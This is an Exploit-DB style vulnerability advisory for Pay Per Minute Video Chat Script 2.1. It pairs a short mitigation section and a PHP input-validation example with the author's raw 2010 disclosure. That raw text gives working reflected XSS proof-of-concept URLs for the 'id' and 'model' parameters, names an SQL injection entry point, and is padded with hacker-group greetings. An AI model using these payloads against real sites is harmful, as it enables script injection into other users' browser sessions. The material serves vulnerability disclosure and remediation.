Vendor: Pay Per Minute Video Chat Script
By: R3d-D3v!L
CVSS: 8.8 HIGH
Type: XSS
CWE: 79
Product Name: Pay Per Minute Video Chat Script
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:payperviewvideosoftware.com:pay_per_minute_video_chat_script:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Suffer from Multi XSS Vulnerability

Pay Per Minute Video Chat Script V 2.1 is vulnerable to multiple XSS attacks. An attacker can inject malicious JavaScript code into the vulnerable parameters of the application. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

Mitigation:

Input validation should be used to prevent XSS attacks. All user-supplied input should be validated and filtered before being used in the application.
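
The mitigation above, sketched for the two parameters the advisory names (`id` and `model`). This is an added example, not the vendor's code: the helper names, the assumed model-name format and the sample requests are assumptions, and it pairs input validation with output encoding on the assumption that both values are reflected into HTML.

```php
<?php
declare(strict_types=1);

// Added illustration: helper names and the model-name format are assumptions.

/** ?id= must be a positive integer; anything else yields null. */
function validated_member_id(array $query): ?int
{
    $id = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return is_int($id) ? $id : null;
}

/** ?model= must match an allow-list pattern (assumed: 1-32 chars of A-Z a-z 0-9 _ -). */
function validated_model(array $query): ?string
{
    $model = $query['model'] ?? null;
    if (!is_string($model) || preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $model) !== 1) {
        return null;
    }
    return $model;
}

/** Encode a value for an HTML text node or quoted attribute. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed requests: one benign, one carrying the value from the advisory's
// test URLs (URL-decoded, as PHP would deliver it in $_GET).
$poc = rawurldecode('%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E');
$requests = [
    ['id' => '42', 'model' => 'anna_01'],
    ['id' => $poc, 'model' => $poc],
];

foreach ($requests as $query) {
    $id = validated_member_id($query);
    $model = validated_model($query);
    if ($id === null || $model === null) {
        // Reject; encode the raw value if it is echoed back in an error page.
        echo '<p>400 invalid parameter: ', h($query['model']), "</p>\n";
        continue;
    }
    // Accepted values are still encoded at output: validation is not a substitute.
    echo '<a href="videos.php?model=', h(rawurlencode($model)), '">member ', $id, "</a>\n";
}
```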

Exploit-DB raw data:

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: suffer from multi XSS Vulnerability
[~] Vendor: payperviewvideosoftware.com
[?] Software : Pay Per Minute Video Chat Script V 2.1
[-] pR!CE : $269.00 USD.
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[-]
[?] Date: 4.Jan.2010
[?] T!ME: 07:15 pm GMT
[?] Home: WwW.xP10.ME
[?]
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????

XSS:

[*] Err0r C0N50L3:

http://server/P47H/admin/memberviewdetails.php?id=
http://server/P47H/videos.php?model=

[~] {EV!L EXPLO!T}:


http://server/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E

http://server/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E


SQL Injection:

[*] Err0r C0N50L3:

http://server/P47H/index_ie.php?page=-666

[~] {EV!L EXPLO!T}:

n07 ALL0w AT Th!S T!ME

N073:

REAL RED DEV!L W@S h3r3 LAMERZ


GAZA !N our hearts !


[~]-----------------------------{((Angela Bennett))}---------------------------------------


[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca &((OFFsec))

[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t))

[~]spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]{[(D!R 4ll 0R D!E)]};

[~]---------------------------------------------------------------------------------------------